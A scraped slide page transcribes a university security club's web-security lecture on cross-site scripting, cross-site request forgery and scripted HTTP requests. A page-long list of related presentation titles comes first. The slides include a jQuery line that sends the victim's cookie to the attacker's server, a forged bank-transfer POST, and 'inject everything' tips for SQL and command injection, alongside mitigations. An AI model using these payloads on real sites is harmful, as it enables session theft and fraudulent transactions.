WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

Slides:

Advertisements

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Advertisements

Nick Feamster CS 6262 Spring 2009

Past, Present and Future By Eoin Keary and Jim Manico

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.

WebGoat & WebScarab “What is computer security for $1000 Alex?”

EECS 354 Network Security Cross Site Scripting (XSS)

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to Application Penetration Testing

OWASP Zed Attack Proxy Project Lead

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report

Prevent Cross-Site Scripting (XSS) attack

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

CSCI 6962: Server-side Design and Programming Secure Web Programming.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Cross-Site Attacks James Walden Northern Kentucky University.

Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.

Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim

CSCE 201 Web Browser Security Fall CSCE Farkas2 Web Evolution Web Evolution Past: Human usage – HTTP – Static Web pages (HTML) Current: Human.

The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Web Applications Testing By Jamie Rougvie Supported by.

Building Secure Web Applications With ASP.Net MVC.

By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.

Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.

CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

WEB SECURITY WORKSHOP TEXSAW 2015 Presented by Jiayang Wang and Corrin Thompson.

EECS 354: Network Security Group Members: Patrick Wong Eric Chan Shira Schneidman Web Attacks Project: Detecting XSS and SQL Injection Vulnerabilities.

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

COSC 2328 – Web Programming.  PHP is a server scripting language  It’s widely-used and free  It’s an alternative to Microsoft’s ASP and Ruby  PHP.

WEB SECURITY WEEK 1 Computer Security Group University of Texas at Dallas.

By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,

Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.

SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.

Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.

Javascript worms By Benjamin Mossé SecPro

Introduction to Information Security

Group 18: Chris Hood Brett Poche

Building Secure ColdFusion Applications

CSCE 548 Student Presentation Ryan Labrador

An Introduction to Web Application Security

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

World Wide Web policy.

Cross-Site Scripting Travis Deyarmin.

Cross-Site Forgery

Web Applications Security XSS

Automatic and Precise Client-Side Protection against CSRF Attacks

CSC 495/583 Topics of Software Security Intro to Web Security

Cross-Site Request Forgery (CSRF) Attack Lab

Lecture 26: Web Security CS /2/2018.

Cross-Site Scripting Attack (XSS)

Cross Site Request Forgery (CSRF)

Presentation transcript:

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas

Cross Site Scripting

Overview  Exploits the trust a browser places in a site by running code (usually JS) in browser  Reflected: user is tricked into running some code  In URL: site.com/?msg= …  Pasted into address bar  Stored: the malicious code is stored persistently on the compromised website  Unfiltered comments  SQL injections allowing user control where not intended

Payloads and Goals  Steal cookies  Open a hidden IFRAME  Spam advertisements  Redirect to another page  Click jacking  Many more

Example Attack  Uses jQuery  $.get(‘ + document.cookie);  A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.

Example 1 

Mitigation  Developers  Don’t allow users to post HTML  Keep an eye out for places where attackers could modify what other peoples’ browsers render  Users  Use NoScript or similar whitelisting plugin  Don’t click or paste a link with JavaScript in it

Challenge 

Cross Server Request Forgery

Overview  Similar to XSS  Exploits trust that servers place in browsers  It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval  Different than XSS, but XSS is often an attack vector for CSRF

Example Attack  Images  XSS $.post(‘bank.com/transfer.php’, {to: ‘me’, amount: });

Mitigation  Only trust requests from your domain  Use CSRF protection tokens – included in many web frameworks  Use the appropriate HTTP request, don’t use GET for something that modifies data  Not much to do as a user

Python for Web

Python Web Scripts  Python is a powerful scripting language.  Some web problems are very repetitious.  Using libraries urllib and urllib2.

Example Code  import urllib  import urllib2  url = '  values = {'name' : 'Michael Foord',  'location' : 'Northampton',  'language' : 'Python' }  data = urllib.urlencode(values)  req = urllib2.Request(url, data)  response = urllib2.urlopen(req)  the_page = response.read()

Example 2 

Mitigation  Captchas  Lockouts after several attempts

Challenge 2 

General Tips

Look at Requests!  Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc.  The idea is to find things we can alter  The goal is to invalidate trust that the developer put in us

Inject Everything  If your data goes into a database query, try SQL injection  If you think it’s piping your input into a program, try command injection via && and the like  If it looks like it’s rendering HTML, try some JavaScript

Questions?